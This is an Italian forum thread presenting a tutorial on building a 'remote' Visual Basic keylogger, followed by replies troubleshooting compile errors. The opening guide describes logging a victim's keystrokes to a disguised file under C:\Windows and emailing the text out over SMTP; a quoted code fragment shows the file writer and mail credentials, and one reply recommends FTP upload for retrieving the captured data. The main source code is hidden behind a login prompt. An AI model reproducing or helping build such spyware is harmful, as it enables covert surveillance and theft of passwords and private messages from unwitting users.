• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida Come creare un Keylogger REMOTO

Riferimento: Come creare un Keylogger REMOTO

salve a tutti a me durante la compilazione mi da ben 14 errori :emoji_smiley: tra cui label1 non dichiarato label 4 non dichiarato ecc...come mai?
 
Riferimento: Come creare un Keylogger REMOTO

Cioè nemmeno copiare alcuni sono capaci D:
Se avete problemi non intasate qua, aggiungetemi su skype : jacox.best1
 
  • Like
Reactions: 1 person
Riferimento: Come creare un Keylogger REMOTO

jakub li ho messi i label nel form e mi dice sempre così
 
Riferimento: Come creare un Keylogger REMOTO

a me non da nessun errore , però non mi arriva niente :\
 
Riferimento: Come creare un Keylogger REMOTO

salve!
Questa mattina volevo creare un keylogger remoto visto che non tutti funzionano..allora ho dato il via alla mia immaginazione :emoji_relieved:.
In questa guida vi insegnerò come crearlo!bene iniziamo.

1)apriamo visual basic.(|=o)--->nuovo progetto---->diamo il nome che volete--->eccoci alla form.
2)inseriamo i seguenti elementi dalla barra!
1 timer
1 textbox
4 label

ora vi spiego come ho ideato questo keylogger!
Ho iniziato a creare un keylogger in locale poi ho pensato di farlo remoto inviando le email contenenti il testo digitato...
Quindi ho fatto che quando chi scrive registra i tasti in un file txt il keylogger inserisce i dati anche nella textbox...
Poi quando la textbox è arrivata a un certo numero di lettere allora invia l'email...e quando l'ha inviata si svuota la textbox e si fa sempre il giro...

ai label date questi titoli...
Label1.text=email mandate
label2.text=0
label3.text=lettere
label4.text=0
ora passiamo ai codici.
Cliccate sul for, cancellate tutto e incollate questo.
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

fonti me

scs poi mettere dowload basik e ql skreen geaz
 
Riferimento: Come creare un Keylogger REMOTO

le mail non le invia perchè il dovete mettere un smtp adatto alla vostra connessione, vi consiglio ifatti per un keylogger remoto di sfruttare il caricamento ftp e non l'invio di email dato che se l'smtp non è quello della "vittima" non funzionerà e non so se si può impostare con una sorta si scelta automatica del smtp.


Usate FTP per vedere i risultati del keylogger.
 
Riferimento: Come creare un Keylogger REMOTO

@Jeckoz , Visto che è una Guida non dovrebbe andare nella sezione "Guide & Tutorial" ?
PS: Bel Keylogger, Complimenti :emoji_smiley:

--------------- AGGIUNTA AL POST ---------------
Ti ricordo che siamo in un forum italiano.

Io direi che sarebbe l'ora di chiuderlo questo thread...


Chiuderlo penso di no Dato che è comunque un Buon Keylogger.
 
Ultima modifica:
Riferimento: Come creare un Keylogger REMOTO

@Jeckoz , Visto che è una Guida non dovrebbe andare nella sezione "Guide & Tutorial" ?
PS: Bel Keylogger, Complimenti :emoji_smiley:

--------------- AGGIUNTA AL POST ---------------



Chiuderlo penso di no Dato che è comunque un Buon Keylogger.

Come puoi leggere sotto la sezione Guide: " In questa sezione verranno raccolte, tutte le guide sui linguaggi di programmazione!
QUI SI PARLA DI TUTTO MA NON DEL PHP E VISUAL BASIC"

Questo non è assolutamente un "Buon Keylogger" mai visto un codice più "sporco " e mal ottimizzato, nessuno che abbia una anche minima conoscenza della programmazione non penserebbe neanche lontanamente di fare una cosa tipo questa:

For i As Integer = 3 To 255
Dim fi As FileInfo = New FileInfo("C:\Windows\DriverSys.txt")
Dim sw As StreamWriter
....
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("TUA EMAIL", "PASSWORD")
smtpServer.Port = 587
smtpServer.Host = "smtp.live.com"
....

Next

Questo al limite può essere preso come NON programmare.
 
Riferimento: Come creare un Keylogger REMOTO

raga a me dice quando faccio avviare e faccio 500 caratteri

il server non supporta connessioni protette :S
 
Riferimento: Come creare un Keylogger REMOTO

o.O quante visite per una cosa così semplice, lo facevo a 8 anni
 
Riferimento: Come creare un Keylogger REMOTO

raga ma perke se faccio il debug invia sempre

ma se uso il programma in se in exe non mi invia QUASI mai
 
Riferimento: Come creare un Keylogger REMOTO

Scusate sto cercando di capire tutto, ho letto le 7 pagine con più attenzione possibile.

Ecco, guardate, ho fatto così.

Perfavore, Entra oppure Registrati per vedere i Link!


Poi faccio: View -> CODE > cancello tutto ed incollo il codice.

LO MODIFICO COME DICEVATE DI COMPILARLO! Ovvero al posto di 500 then, ho messo 100. Email x3, password e stop.

Perfavore, Entra oppure Registrati per vedere i Link!


Qua penso: E' fatta, invece?

Error 1 Event 'Load' cannot be found. C:\Documents and Settings\Sky\Impostazioni locali\Dati applicazioni\Temporary Projects\WindowsApplication1\Form1.vb 6 103 WindowsApplication1
Error 2 'Visible' is not a member of 'WindowsApplication1.TaskHost'. C:\Documents and Settings\Sky\Impostazioni locali\Dati applicazioni\Temporary Projects\WindowsApplication1\Form1.vb 7 9 WindowsApplication1
Error 3 'Timer1' is not declared. It may be inaccessible due to its protection level. C:\Documents and Settings\Sky\Impostazioni locali\Dati applicazioni\Temporary Projects\WindowsApplication1\Form1.vb 8 9 WindowsApplication1
Error 4 Handles clause requires a WithEvents variable defined in the containing type or one of its base types. C:\Documents and Settings\Sky\Impostazioni locali\Dati applicazioni\Temporary Projects\WindowsApplication1\Form1.vb 10 97 WindowsApplication1
Error 5 'Visible' is not a member of 'WindowsApplication1.TaskHost'. C:\Documents and Settings\Sky\Impostazioni locali\Dati applicazioni\Temporary Projects\WindowsApplication1\Form1.vb 11 9 WindowsApplication1
Error 6 'TextBox1' is not declared. It may be inaccessible due to its protection level. C:\Documents and Settings\Sky\Impostazioni locali\Dati applicazioni\Temporary Projects\WindowsApplication1\Form1.vb 29 17 WindowsApplication1
Error 7 'TextBox1' is not declared. It may be inaccessible due to its protection level. C:\Documents and Settings\Sky\Impostazioni locali\Dati applicazioni\Temporary Projects\WindowsApplication1\Form1.vb 29 33 WindowsApplication1
Error 8 'TextBox1' is not declared. It may be inaccessible due to its protection level. C:\Documents and Settings\Sky\Impostazioni locali\Dati applicazioni\Temporary Projects\WindowsApplication1\Form1.vb 30 20 WindowsApplication1
Error 9 'Label4' is not declared. It may be inaccessible due to its protection level. C:\Documents and Settings\Sky\Impostazioni locali\Dati applicazioni\Temporary Projects\WindowsApplication1\Form1.vb 40 112 WindowsApplication1
Error 10 'TextBox1' is not declared. It may be inaccessible due to its protection level. C:\Documents and Settings\Sky\Impostazioni locali\Dati applicazioni\Temporary Projects\WindowsApplication1\Form1.vb 41 33 WindowsApplication1
Error 11 'Label4' is not declared. It may be inaccessible due to its protection level. C:\Documents and Settings\Sky\Impostazioni locali\Dati applicazioni\Temporary Projects\WindowsApplication1\Form1.vb 44 21 WindowsApplication1
Error 12 'textbox1' is not declared. It may be inaccessible due to its protection level. C:\Documents and Settings\Sky\Impostazioni locali\Dati applicazioni\Temporary Projects\WindowsApplication1\Form1.vb 45 21 WindowsApplication1
Error 13 'Label1' is not declared. It may be inaccessible due to its protection level. C:\Documents and Settings\Sky\Impostazioni locali\Dati applicazioni\Temporary Projects\WindowsApplication1\Form1.vb 49 9 WindowsApplication1
Error 14 'TextBox1' is not declared. It may be inaccessible due to its protection level. C:\Documents and Settings\Sky\Impostazioni locali\Dati applicazioni\Temporary Projects\WindowsApplication1\Form1.vb 49 23 WindowsApplication1
 
Riferimento: Come creare un Keylogger REMOTO

Noooooo! Non ci posso credere, hai cancellato pure la classe Form1?

Tutto quel codice va inserito nella classe di Form1 :facepalm:

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!
 
Riferimento: Come creare un Keylogger REMOTO

Noooooo! Non ci posso credere, hai cancellato pure la classe Form1?

Tutto quel codice va inserito nella classe di Form1 :facepalm:

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

Ciao Rapa97, ma di quello che ho fatto io, sostanzialmente che cosa ho sbagliato? Io il codice (che sta nella prima pagina) l'ho inserito su. View>Code, eliminando (forse quello che tu chiami FORM)

Ecco la foto
Perfavore, Entra oppure Registrati per vedere i Link!
che cosa devo eliminare e non di questo, nella foto? E dove lo devo piazzare il codice nella prima pagina di questo post?
 
Riferimento: Come creare un Keylogger REMOTO

Ciao Rapa97, ma di quello che ho fatto io, sostanzialmente che cosa ho sbagliato? Io il codice (che sta nella prima pagina) l'ho inserito su. View>Code, eliminando (forse quello che tu chiami FORM)

Ecco la foto
Perfavore, Entra oppure Registrati per vedere i Link!
che cosa devo eliminare e non di questo, nella foto? E dove lo devo piazzare il codice nella prima pagina di questo post?

Devi cancellare l'evento Form1_Load

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

E poi incolli il codice.

Ps. Queste sono le funzioni base di VB.NET, se non le conosci ti consiglio di studiare il linguaggio VB.NET. ;)
PPs. Se hai ancora bisogno Taggami Scrivendo @rapa97. ;)
 
Riferimento: Come creare un Keylogger REMOTO

@rapa97

Ti ricapitolo tutto.

New project > Ok

Metto un text box, timer e 4 Label. Li rinomino modificando la stringa "Text" il 1° lo chiamo "Email mandate" il 2° "0" il 3° "lettere" ed il 4° "0"

Ora mi trovo con scritto al posto di Label 'Email mandate, 0, lettere e 0.'

Clicco sul form per il codice. Come mi hai detto tu elimino:

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Hendles MyBase.Load
End Sub

Ed incollo il codice così, controlla dalla foto
Perfavore, Entra oppure Registrati per vedere i Link!




Mi da 22 errori cazzo! Dove sbaglio?
 
Riferimento: Come creare un Keylogger REMOTO

@rapa97

Ti ricapitolo tutto.

New project > Ok

Metto un text box, timer e 4 Label. Li rinomino modificando la stringa "Text" il 1° lo chiamo "Email mandate" il 2° "0" il 3° "lettere" ed il 4° "0"

Ora mi trovo con scritto al posto di Label 'Email mandate, 0, lettere e 0.'

Clicco sul form per il codice. Come mi hai detto tu elimino:



Ed incollo il codice così, controlla dalla foto
Perfavore, Entra oppure Registrati per vedere i Link!




Mi da 22 errori cazzo! Dove sbaglio?


Ho controllato la guida... Questa guida è per VB 6 e tu stai usando sicuramente le versioni più recenti. ;)